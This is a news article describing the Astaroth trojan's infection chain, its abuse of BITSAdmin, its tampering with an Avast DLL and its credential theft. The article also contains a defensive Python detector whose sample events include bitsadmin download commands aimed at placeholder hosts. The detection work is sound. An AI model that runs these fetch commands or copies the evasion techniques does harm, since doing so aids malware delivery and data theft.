A trojan disguised as an image can infect PCs and avoid being recognized by antivirus. Here’s how Astaroth works
A new campaign using the Astaroth trojan, already known to security experts because it infected thousands of computers around the world in the last three months of 2018, is currently underway in Brazil and Europe. The infection starts from a fake image spread by email.
The new strain of the trojan was discovered by Cybereason researchers. It also abuses BITSAdmin, an official Microsoft Windows utility designed to handle download and upload operations, which the trojan uses to download malicious code. This variant of Astaroth is distributed through spam email campaigns, and the infection begins when the user opens a .7zip archive that is attached to the email, reached through a link or, in fact, disguised as a GIF or JPG image. The malicious archive contains a .lnk file that starts the actual infection. The malware then connects to a server and begins to steal information from the infected computer, and uses BITSAdmin to fetch further images and files from another server.
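Because BITSAdmin is a legitimate, signed Windows utility, the defensive angle is to watch how it is invoked rather than to block the binary. The following is an added example (not code from the article or from Cybereason) that flags process-creation events where bitsadmin.exe is asked to fetch from a remote URL while leaving URL-less administrative calls alone; the event tuples are constructed, and the field layout (image path plus command line) is an assumption about the telemetry source.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events (not real telemetry): (image path, command line).
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\bitsadmin.exe",
     "bitsadmin /transfer job1 /download /priority foreground "
     "http://example.invalid/p.jpg C:\\Users\\Public\\p.jpg"),
    ("C:\\Windows\\System32\\bitsadmin.exe", "bitsadmin /list /allusers"),
    ("C:\\Windows\\System32\\bitsadmin.exe",
     "bitsadmin /addfile mybits http://example.invalid/x.dll C:\\Windows\\Temp\\x.dll"),
    ("C:\\Program Files\\App\\app.exe", "app.exe --sync"),
]

# bitsadmin switches that queue or run a transfer; /list, /info etc. are not interesting on their own.
DOWNLOAD_SWITCHES = {"/transfer", "/addfile", "/download"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass
class Finding:
    command_line: str
    switches: list
    urls: list


def detect_bitsadmin_download(image: str, command_line: str):
    """Return a Finding when bitsadmin.exe is used to pull content from a remote URL, else None.

    Only events that combine a transfer switch with an http(s) source are reported, so
    legitimate local job management is not flagged.
    """
    if not image.lower().endswith("\\bitsadmin.exe"):
        return None
    tokens = command_line.split()
    switches = sorted({t.lower() for t in tokens} & DOWNLOAD_SWITCHES)
    urls = URL_RE.findall(command_line)
    if not switches or not urls:
        return None
    return Finding(command_line, switches, urls)


def scan(events):
    """Run the detector over (image, command_line) pairs and keep the positive results."""
    return [f for f in (detect_bitsadmin_download(i, c) for i, c in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print("BITS download via bitsadmin:", finding.switches, finding.urls)
```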
Immune to antiviruses
What makes Astaroth particularly dangerous, and new compared to previous infections based on this trojan, is its ability to modify a .dll file used by the Avast antivirus by injecting malicious code into it. Once it has infected this file, the trojan uses it to steal further information about the machine it is running on and to download additional code. It also manages to hide itself from an antivirus scan carried out with Avast.
What Astaroth does
The Cybereason research team discovered that once the trojan has successfully infiltrated a machine, it records user keystrokes, intercepts their calls to the operating system and continually gathers everything saved to the clipboard. With these methods it collects significant amounts of personal information, including details of the user's bank accounts. If the infected PC is connected to a LAN, Astaroth can also collect the network access passwords of all the other computers on the same LAN, email account passwords, Messenger account data and Internet Explorer passwords.
Astaroth first appeared online in 2017 and went on to infect thousands of PCs, especially in South America. It went through several evolutions before arriving at the current one. An earlier version, for example, was hidden in fake Amazon emails containing confirmations of orders the user had never placed; if the user clicked the links in the email, the infection started.